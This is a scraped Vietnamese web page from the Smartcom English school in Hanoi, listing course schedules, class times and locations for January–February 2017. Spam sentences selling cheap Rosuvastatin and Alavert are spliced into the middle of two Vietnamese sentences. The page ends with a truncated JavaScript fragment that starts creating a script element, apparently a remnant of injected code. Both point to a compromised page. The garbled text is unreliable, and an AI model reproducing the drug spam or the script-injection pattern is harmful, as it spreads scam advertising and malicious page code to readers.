Lost your password?

HN_Lịch khai giảng tháng 1-2/2017

Công ty Smartcom Việt Nam trân Want to save some money on your Rosuvastatin purchase? No problem! Get Rosuvastatin for 2.04 USD only! trọng thông báo: Lịch khai giảng các khóa học Speaking Grammar, Authentic English, Toeic for Career Success, IELTS Plus, AAT – Luyện phát âm trong tháng 1-2/2017 tại Smartcom 1 – Thái Hà, Smartcom 2 – Nguyễn Chí Thanh cụ thể như sau:

SPEAKING GRAMMAR
Stt Tên lớp Ca học Thời gian Khai giảng Buổi học đầu tiên Địa điểm
1 HN.SG 01.17 18h00 – 19h30 Tối thứ 3 – 5 Thứ 3 – 3/1 Thứ 3 – 10/01 SM1 – 33/41 Thái Hà
2 HN.SG 02.17 19h45 – 21h15 Tối thứ 3 – 5 Thứ 3 – 3/1 Thứ 3 – 17/1 SM1 – 33/41 Thái Hà
3 HN.SG2 03.17 18h00 – 19h30 Tối thứ 4 – 6 Thứ 4 – 15/2 Thứ 6 – 24/2 SM1 – 33/41 Thái Hà
4 HN.SG2 04.17 19h45 – 21h15 Tối thứ 4 – 6 Thứ 4 – 15/2 Thứ 6 – 24/2 SM1 – 33/41 Thái Hà
5 HN.SG 05.17 18h00 – 19h30 Tối thứ 3 – 5 Thứ 5 – 16/2 Thứ 3 – 28/2 SM2 – 71 Nguyễn Chí Thanh
6 HN.SG 06.17 19h45 – 21h15 Tối thứ 3 – 5 Thứ 5 – 16/2 Thứ 3 – 28/2 SM2 – 71 Nguyễn Chí Thanh
7 HN.SG 07.17 18h00 – 19h30 Tối thứ 4 – 6 Thứ 3 – 28/2 Thứ 3 – 7/3 SM1 – 33/41 Thái Hà
8 HN.SG 08.17 19h45 – 21h15 Tối thứ 4 – 6 Thứ 3 – 28/2 Thứ 3 – 7/3 SM1 – 33/41 Thái Hà

 

AUTHENTIC ENGLISH
Stt Tên lớp Ca học Thời gian Khai giảng Buổi học đầu tiên Địa điểm
1 HN.AE20 2.1 step 2 18h00 – 19h30 Thứ 2 – 5 Thứ 2 – 27/2 Thứ 2 – 6/3 SM1 – 33/41 Thái Hà
2 HN.AE20 2.2 step 2 19h45 – 21h15 Thứ 2 – 5 Thứ 2 – 27/2 Thứ 2 – 6/3 SM1 – 33/41 Thái Hà

 

TOEIC 4 SKILLS – TOEIC FOR CAREER SUCCESS
Stt Tên lớp Ca học Thời gian Khai giảng Buổi học đầu tiên Địa điểm
1 HN.TCS 01.17 18h00 – 19h30 Thứ 3 – 5 Thứ 3 – 17/1 Thứ 5 – 23/2 SM2 – 71 Nguyễn Chí Thanh
2 HN.TCS 02.17 19h45 – 21h15 Thứ 4 –  6 Thứ 4 – 18/1 Thứ 4 – 22/2 SM1- số 33/41 Thái Hà

 

AAT – Luyện Phát âm giọng Mỹ
Stt Tên lớp Ca học Thời gian Khai giảng Buổi học đầu tiên Địa điểm
1 HN.AAT 01.17 19h45 – 21h15 Tối thứ 2 Thứ 2 – 26/12 Thứ 2 – 9/1 SM1 – 33/41 Thái Hà
2 HN.AAT 02.17 18h00 – 19h30 Tối thứ 2 Thứ 2 – 20/2 Thứ 3 – 6/3 SM1 – 33/41 Thái Hà

 

IELTS PLUS
Stt Tên lớp Ca học Thời gian Khai giảng Buổi học đầu tiên Địa điểm
1 HN.IELTS Plus 01.17 18h00 – 19h30 Tối Thứ 3 – 5 Thứ 3 – 21/2 Thứ 3 – 7/3 SM1 – 33/41 Thái Hà
2 HN.IELTS Plus 02.17 19h45 – 21h15 Tối Thứ 3 – 5 Thứ 3 – 21/2 Thứ 3 – 7/3 SM1 – 33/41 Thái Hà

 

ACTIVE KIDS
Stt Tên lớp Ca học Thời gian Lịch học Địa điểm
1 AK 0.1 (level 0) 8h30 – 11h30 Sáng Thứ 7 Thứ 7 hàng tuần SM2 – 71 Nguyễn Chí Thanh
2 AK 0.2 (Level 0) 14h30 – 17h30 Chiều Chủ nhật CN hàng tuần SM2 – 71 Nguyễn Chí Thanh
3 AK 1.1 (Level 1) 8h30 – 11h30 Sáng Chủ nhật CN hàng tuần SM2 – 71 Nguyễn Chí Thanh
4 AK 1.2 (Level 1) 8h30 – 11h30 Sáng Chủ nhật CN hàng tuần SM2 – 71 Nguyễn Chí Thanh
5 AK 2.1 (Level 2) 14h00 – 17h00 Chiều Thứ 7 Thứ 7 hàng tuần SM2 – 71 Nguyễn Chí Thanh
6 AK 2.2 (Level 2) 14h30 – 17h30 Chiều Chủ nhật CN hàng tuần SM2 – 71 Nguyễn Chí Thanh
7 AK 2.3 (level 2) 8h30 – 11h30 Sáng Thứ 7 Thứ 7 hàng tuần SM2 – 71 Nguyễn Chí Thanh
8 AK 3.1 (Level 3) 14h00 – 17h00 Chiều Chủ nhật CN hàng tuần SM2 – 71 Nguyễn Chí Thanh
9 AK 3.2 (level 3) 14h30 – 17h30 Chiều Thứ 7 Thứ 7 hàng tuần SM2 – 71 Nguyễn Chí Thanh

Lưu ý:

– Buổi học đầu tiên là If you are looking for cheap Alavert, but still are unsuccessful, you can enjoy buying it for only 0.61 USD right now at our online store! thời gian dự kiến.

– Để hỗ trợ thêm thông tin các bạn vui lòng liên hệ tới số 04. 3262 6699 hoặc 04.6291 8666 hoặc gửi thư về hòm thư center@smartcom.vn

var d=document;var s=d.createElement(‘script’);